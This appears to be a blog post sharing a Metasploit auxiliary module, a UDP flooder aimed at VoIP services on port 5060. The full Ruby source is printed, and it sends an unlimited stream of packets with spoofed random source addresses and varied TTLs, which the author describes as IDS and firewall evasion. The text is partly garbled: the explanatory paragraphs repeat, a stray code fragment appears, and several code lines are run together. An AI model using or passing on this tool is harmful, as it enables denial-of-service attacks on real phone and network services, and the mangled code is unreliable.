There are very few Metasploit modules, neither Auxiliaries nor Exploits, VoIP related so I have in mind to write some of them in my free time. Today I want to share a UDP flooder Aux. module, which is very simple but perfect for learning, UDPFlooder is one of the many tools covered in "Hacking VoIP Exposed" book, considered a reference in this field.
Code:
-------------------------------------------------------------------------
register_options(
--------------------------------------------------------------------------
Most of the code is taken from Metasploit TCP SYN Flooder module but I made some more changes besides adapting it to UDP. The same way TTL is changed in each packet, I prefer to change the source (spoofed) address too because of the same reason (IDS/Firewall evasion). Moreover, in this case something to send is needed so I added the new option SIZE which determines the lenght of this random string. Another different thing you could apprecciate is that option SNAPLEN is unregistered too because of having no sense in this module.
Finally, in order to test if module works fine I´m going to sniff the interface and see, with help of Wireshark, what it´s really happening. Next picture shows that everything seems to be working as defined in the description of the attack. :)
Code:
-------------------------------------------------------------------------
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dosinclude Msf::Exploit::Capture
def initialize
super(
'Name' => 'UDP Flooder',
'Description' => 'A simple UDP flooder',
'Author' => 'Jesus Perez',
'License' => MSF_LICENSE,
'Version' => '$Revision: 0 $'register_options(
[
Opt::RPORT(5060),
OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
OptInt.new('SPORT', [false, 'The source port (else randomizes)']),
OptInt.new('NUM', [false, 'Number of UDP packets to send (else unlimited)']),
OptInt.new('SIZE', [false, 'Size of UDP packets to send (else 256 bytes)'])
], self.class)
deregister_options('FILTER','PCAPFILE','SNAPLEN')
end
def sport
datastore['SPORT'].to_i.zero? ? rand(65535)+1 : datastore['SPORT'].to_i
end
def rport
datastore['RPORT'].to_i
end
def srchost
datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
end
def size
datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i
end
def run
open_pcap
sent = 0
num = datastore['NUM']
print_status("UDP flooding #{rhost}:#{rport}...")
p = PacketFu::UDPPacket.newp.ip_daddr = rhost
p.udp_dport = rport
while (num <= 0) or (sent < num)
p.ip_ttl = rand(128)+128
p.ip_saddr = srchost
p.udp_sport = sport
p.payload = rand(36**size).to_s(36)
p.recalc
capture_sendto(p,rhost)
sent += 1
end
close_pcap
end
end
--------------------------------------------------------------------------
Most of the code is taken from Metasploit TCP SYN Flooder module but I made some more changes besides adapting it to UDP. The same way TTL is changed in each packet, I prefer to change the source (spoofed) address too because of the same reason (IDS/Firewall evasion). Moreover, in this case something to send is needed so I added the new option SIZE which determines the lenght of this random string. Another different thing you could apprecciate is that option SNAPLEN is unregistered too because of having no sense in this module.
Figure: Usage information
Finally, in order to test if module works fine I´m going to sniff the interface and see, with help of Wireshark, what it´s really happening. Next picture shows that everything seems to be working as defined in the description of the attack. :)
Figures: Sniffed packets
Jesús Pérez